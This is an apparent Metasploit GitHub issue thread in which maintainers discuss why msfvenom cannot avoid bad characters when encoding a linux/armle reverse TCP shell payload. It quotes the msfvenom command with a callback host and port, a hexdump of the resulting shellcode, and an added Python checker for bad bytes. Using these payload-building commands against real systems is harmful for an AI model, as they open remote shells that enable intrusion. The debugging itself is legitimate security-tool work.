
Error An encoding exception occurred linux/armle/shell_reverse_tcp

Open umerov1999 opened this issue 9 years ago • 2 comments

msfvenom -p linux/armle/shell_reverse_tcp -b '\x00\x0a\x0d\x40' lhost=192.168.1.122 lport=1996 R > shell.bin

No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: armle from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=1, char=0x00)
Error: An encoding exception occurred.

umerov1999 Jan 17 '16 15:01

Hmm, looks like we would need an arm-specific encoder to avoid badchars.

bcook-r7 Jan 17 '16 16:01

I don't get the generic/none failed with Encoding failed due to a bad character (index=1, char=0x00) error described in the original post.

The generic/none encoder is not used when using elf or raw formats. The payload is returned without modification; i.e., bad characters are ignored.

# ./msfvenom -p linux/armle/shell_reverse_tcp -b '\x00\x0a\x0d\x40' lhost=192.168.1.122 lport=1996 R > shell.bin
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: armle from the payload
No encoder specified, outputting raw payload
Payload size: 172 bytes

# hexdump -C shell.bin | grep 00
00000000  02 00 a0 e3 01 10 a0 e3  05 20 81 e2 8c 70 a0 e3  |......... ...p..|
00000010  8d 70 87 e2 00 00 00 ef  00 60 a0 e1 60 10 8f e2  |.p.......`..`...|
00000020  10 20 a0 e3 8d 70 a0 e3  8e 70 87 e2 00 00 00 ef  |. ...p...p......|
00000030  06 00 a0 e1 00 10 a0 e3  3f 70 a0 e3 00 00 00 ef  |........?p......|
00000040  06 00 a0 e1 01 10 a0 e3  3f 70 a0 e3 00 00 00 ef  |........?p......|
00000050  06 00 a0 e1 02 10 a0 e3  3f 70 a0 e3 00 00 00 ef  |........?p......|
00000060  24 00 8f e2 04 40 24 e0  10 00 2d e9 0d 20 a0 e1  |$....@$...-.. ..|
00000070  24 40 8f e2 10 00 2d e9  0d 10 a0 e1 0b 70 a0 e3  |$@....-......p..|
00000080  00 00 00 ef 02 00 07 cc  c0 a8 01 7a 2f 62 69 6e  |...........z/bin|
00000090  2f 73 68 00 00 00 00 00  00 00 00 00 73 68 00 00  |/sh.........sh..|
000000a0  00 00 00 00 00 00 00 00  00 00 00 00              |............|
000000ac
# hexdump -C shell.bin | grep 0a
000000a0  00 00 00 00 00 00 00 00  00 00 00 00              |............|
000000ac
# hexdump -C shell.bin | grep 0d
00000060  24 00 8f e2 04 40 24 e0  10 00 2d e9 0d 20 a0 e1  |$....@$...-.. ..|
00000070  24 40 8f e2 10 00 2d e9  0d 10 a0 e1 0b 70 a0 e3  |$@....-......p..|

Metasploit still does not have 32-bit and 64-bit ARM encoders, in large part due to Metasm not supporting 32-bit ARM or 64-bit ARM. Development on the metasm project seems to have stalled, and AArch64 contributions have been ignored. As such, ARM encoders would likely require hand-crafted assembly to be modified at runtime.

bcoles Oct 04 '24 18:10
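An added check, not part of the thread or of Metasploit, that does the raw-payload verification from the last comment in Python: it rebuilds the bytes from the quoted `hexdump -C` listing (embedded below as the sample input) and scans them directly, so the offset column cannot produce a false match the way `grep 0a` does on the `000000a0` row above. The `-b` parsing assumes the `\xNN` form shown in the issue.

```python
import re

# Constructed sample input: the `hexdump -C shell.bin` listing quoted in the thread.
HEXDUMP = """\
00000000  02 00 a0 e3 01 10 a0 e3  05 20 81 e2 8c 70 a0 e3  |......... ...p..|
00000010  8d 70 87 e2 00 00 00 ef  00 60 a0 e1 60 10 8f e2  |.p.......`..`...|
00000020  10 20 a0 e3 8d 70 a0 e3  8e 70 87 e2 00 00 00 ef  |. ...p...p......|
00000030  06 00 a0 e1 00 10 a0 e3  3f 70 a0 e3 00 00 00 ef  |........?p......|
00000040  06 00 a0 e1 01 10 a0 e3  3f 70 a0 e3 00 00 00 ef  |........?p......|
00000050  06 00 a0 e1 02 10 a0 e3  3f 70 a0 e3 00 00 00 ef  |........?p......|
00000060  24 00 8f e2 04 40 24 e0  10 00 2d e9 0d 20 a0 e1  |$....@$...-.. ..|
00000070  24 40 8f e2 10 00 2d e9  0d 10 a0 e1 0b 70 a0 e3  |$@....-......p..|
00000080  00 00 00 ef 02 00 07 cc  c0 a8 01 7a 2f 62 69 6e  |...........z/bin|
00000090  2f 73 68 00 00 00 00 00  00 00 00 00 73 68 00 00  |/sh.........sh..|
000000a0  00 00 00 00 00 00 00 00  00 00 00 00              |............|
000000ac
"""

def parse_badchars(spec):
    """Parse an msfvenom-style -b string such as '\\x00\\x0a\\x0d\\x40' into a byte set."""
    return {int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", spec)}

def parse_hexdump(text):
    """Rebuild raw bytes from `hexdump -C` output, using only the hex column."""
    out, last = bytearray(), b""
    for line in text.splitlines():
        m = re.match(r"^([0-9a-f]{8})  ([0-9a-f ]+?)\s*\|", line)
        if not m:
            continue  # final length-only line, or a '*' squeeze marker
        off = int(m.group(1), 16)
        while last and len(out) < off:  # expand rows hidden behind a '*'
            out += last
        last = bytes.fromhex(m.group(2).replace(" ", ""))
        out += last
    return bytes(out)

def find_badchars(payload, bad):
    """Return (index, byte) for every payload byte that is in the bad set."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]

def first_badchar(payload, bad):
    """Mirror msfvenom's report: the first offending (index, char), or None if clean."""
    hits = find_badchars(payload, bad)
    return hits[0] if hits else None

if __name__ == "__main__":
    raw = parse_hexdump(HEXDUMP)
    bad = parse_badchars(r"\x00\x0a\x0d\x40")
    for idx, ch in find_badchars(raw, bad):
        print(f"bad character at index={idx} char=0x{ch:02x}")
```

Run against the listing it reports the 0x00 at index 1 that msfvenom complained about, the 0x40 and 0x0d hits, and no 0x0a at all, confirming the `grep 0a` line was matching the offset column.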